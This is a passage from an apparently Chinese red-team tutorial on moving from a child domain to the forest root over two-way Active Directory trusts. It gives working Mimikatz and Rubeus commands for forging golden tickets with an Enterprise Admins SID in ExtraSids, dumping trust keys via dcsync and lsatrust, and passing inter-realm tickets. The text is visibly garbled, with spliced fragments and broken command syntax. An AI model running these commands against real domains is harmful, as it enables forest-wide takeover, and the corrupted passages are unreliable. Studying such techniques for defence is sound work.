双向信任

在之前有了上一小节的理论基础，我们讨论了当前域中的来利用手法，然而在实际的企业组织中，我们会面临多个域、多个森林。我们当前所在的域，会有父域、子域、具有信任关系的森林等。那么接下来，我们会逐一讨论各种情况。首先，我们讨论双向信任实现域间的移动。因为双向信任既可以发生于森林之内，这种情况存在也可以发生于同一森林之间，例如父域与子域、不同子域之间（例如child1.red.local与child2.red.local）、以及森林之间。但在正式因此我们分别讨论之前，我们需要明确一些概念与名词，帮助我们更好理解。如果依旧对以下的名次与概念有些迷惑，那也不要紧，我们会在后续的实际攻击中加深理解。

森林之内

森林之内的横向移动是最简单的情形，因为信任是相互的，例如从子域移动到父域。我们有 2 种方式在森林之内移动，分别是利用 krbtgt 以及信任密钥。，我们不妨在 Dc01 上进行利用 powerview 来枚举一下域信任，虽然我们是知道预期结果的。SoureName 是当前域，TargetName 是外部域，WITHIN_FOREST 说明是森林之内的信任，Bidirectional 是指双向信任。

krbtgt 

1：由于信任在 AD 森林中的作用方式，sidHistory 属性 (PAC 中的 ExtraSids) 在森林的域中是起作用的，因为这也些 SID 不会在跨域引用中被 SID 过滤器过滤掉。因此，将 sidHistory/ExtraSids 设置为根域中的企业管理员的 SID 能够奏效，就好像他们真的是最是企业管理员一样。Microsoft 已经典知道这是一个问题，因此 sidHistory 是一个受保护的属性，很难修改，在以前对其的利用也是相当复杂的。
现在，我们只需要一句话利有了 Mimikatz/Rubeus 的黄金票据模块，攻击者可以为伪造的票据设置 KERB_VALIDATION_INFO 结构体 (该结构“定义了 DC 提供的用即可。在 mimikatz户登录和授权信息) 中的 ExtraSids 部分，先获得ExtraSids krbtgt被描述为指向 KERB_SID_AND_ATTRIBUTES 结构体列表的凭证指针，该结构包含与主体所属域以外的域中的组相对应的 SID 列表。

因此，如果攻击者在森林中的任何子域中能有权限检索子域的 krbtgt 哈希，将根域的企业管理员的 SID 添加到 Mimikatz 伪造的黄金票据中，便可以接管整片森林。

但，这仅适用于在森林内的双向信任，由于 SID 过滤，这不适用于森林直接的双向信任。我们来看看利用的过程：

获得子域的 krbtgt 密钥：

2：利用将 ExtraSids 设置为企业管理员的 SID 历史

kerberos::

Rubeus.exe golden /aes256:8d253b4d7db4f28ccbb653ba5dfc3ba878bd376d99ab4859d575201935d79157 /user:Administrator /domain:<当前域> prod.raven-med.local /sid:<当前域SID>S-1-5-21-1674258736-4167122442-1078531953 /sids:<目标域EA的SID>S-1-5-21-3775014555-2484002919-2799327105-512 /krbtgt:<krbtgtnowrap NTLM>

创建牺牲会话、导入票据以及验证访问。

3：验证访问

信任密钥

1：在 mimikatz 中，首先我们需要得到信任密钥，通过下述命令之一获得：

mimikatz lsadump::dcsync  /doimain:<当前域>domain:prod.raven-med.local /user:<父域$>，或者命令raven-med$
mimikatz lsadump::lsatrust /patch 得到。

kerberos::golden /domain:<当前域> /sid:<当前域SID> /sids:<外部域EA的SID> /rc4:<信任密钥> /user:Administrator /service:krbtgt /target:<目标域>  /ticket:<票据位置>

rubeus.exe asktgs /ticket:<生成的票据> /service:cifs/<目标域控fqdb> /dc:<目标域控 fqdn > /ptt